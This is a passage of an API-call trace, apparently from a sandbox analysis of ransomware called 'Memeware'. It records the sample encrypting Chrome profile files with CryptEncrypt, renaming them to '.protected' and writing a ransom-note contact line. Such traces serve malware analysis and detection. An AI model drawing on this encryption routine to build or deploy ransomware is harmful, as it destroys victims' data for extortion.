lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.410] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.410] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.410] CloseHandle (hObject=0x154) returned 1 [0078.410] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0078.410] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0078.410] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.410] StrStrIW (lpFirst="Cookies", lpSrch=".protected") returned 0x0 [0078.410] lstrcmpW (lpString1="Cookies", lpString2="RESTORE_FILES.txt") returned -1 [0078.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".txt") returned 0x0 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".rar") returned 0x0 [0078.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0078.411] StrStrW (lpFirst="Cookies", lpSrch=".zip") returned 0x0 [0078.411] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1c00, lpOverlapped=0x0) returned 1 [0078.413] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.413] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1c00, lpOverlapped=0x0) returned 1 [0078.414] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.414] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.414] CloseHandle (hObject=0x154) returned 1 [0078.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.protected") returned 97 [0078.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies.protected")) returned 1 [0078.415] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Windows") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Program Files") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="Program Files (x86)") returned -1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="$Recycle.bin") returned 1 [0078.415] lstrcmpiW (lpString1="Cookies-journal", lpString2="System Volume Information") returned -1 [0078.415] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrIW (lpFirst="Cookies-journal", lpSrch=".protected") returned 0x0 [0078.416] lstrcmpW (lpString1="Cookies-journal", lpString2="RESTORE_FILES.txt") returned -1 [0078.416] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.416] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".txt") returned 0x0 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".rar") returned 0x0 [0078.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0078.416] StrStrW (lpFirst="Cookies-journal", lpSrch=".zip") returned 0x0 [0078.416] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.416] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.416] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.417] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.417] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.418] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.418] CloseHandle (hObject=0x154) returned 1 [0078.419] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.protected") returned 105 [0078.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal.protected")) returned 1 [0078.419] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="Windows") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="Program Files") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="Program Files (x86)") returned -1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="$Recycle.bin") returned 1 [0078.419] lstrcmpiW (lpString1="Current Session", lpString2="System Volume Information") returned -1 [0078.419] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.419] StrStrIW (lpFirst="Current Session", lpSrch=".protected") returned 0x0 [0078.419] lstrcmpW (lpString1="Current Session", lpString2="RESTORE_FILES.txt") returned -1 [0078.419] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.420] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.420] StrStrW (lpFirst="Current Session", lpSrch=".txt") returned 0x0 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.420] StrStrW (lpFirst="Current Session", lpSrch=".rar") returned 0x0 [0078.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0078.421] StrStrW (lpFirst="Current Session", lpSrch=".zip") returned 0x0 [0078.421] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1d6, lpOverlapped=0x0) returned 1 [0078.421] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1d6, lpOverlapped=0x0) returned 1 [0078.422] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.422] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.423] CloseHandle (hObject=0x154) returned 1 [0078.423] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.protected") returned 105 [0078.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session.protected")) returned 1 [0078.424] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Windows") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Program Files") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="Program Files (x86)") returned -1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="$Recycle.bin") returned 1 [0078.424] lstrcmpiW (lpString1="Current Tabs", lpString2="System Volume Information") returned -1 [0078.424] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.424] StrStrIW (lpFirst="Current Tabs", lpSrch=".protected") returned 0x0 [0078.424] lstrcmpW (lpString1="Current Tabs", lpString2="RESTORE_FILES.txt") returned -1 [0078.424] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.424] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.424] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.424] StrStrW (lpFirst="Current Tabs", lpSrch=".txt") returned 0x0 [0078.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.425] StrStrW (lpFirst="Current Tabs", lpSrch=".rar") returned 0x0 [0078.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0078.425] StrStrW (lpFirst="Current Tabs", lpSrch=".zip") returned 0x0 [0078.425] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x126, lpOverlapped=0x0) returned 1 [0078.426] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffeda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x126, lpOverlapped=0x0) returned 1 [0078.426] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.426] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.427] CloseHandle (hObject=0x154) returned 1 [0078.427] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.protected") returned 102 [0078.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs.protected")) returned 1 [0078.429] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Windows") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Program Files") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="Program Files (x86)") returned -1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="$Recycle.bin") returned 1 [0078.429] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="System Volume Information") returned -1 [0078.429] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 108 [0078.429] lstrcmpW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0078.429] lstrcmpW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0078.429] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*") returned 110 [0078.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\.") returned 110 [0078.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.455] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\..") returned 111 [0078.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.455] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.455] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0078.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.455] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.455] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0078.456] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.456] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.456] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.456] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.457] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.457] CloseHandle (hObject=0x158) returned 1 [0078.457] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.protected") returned 129 [0078.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 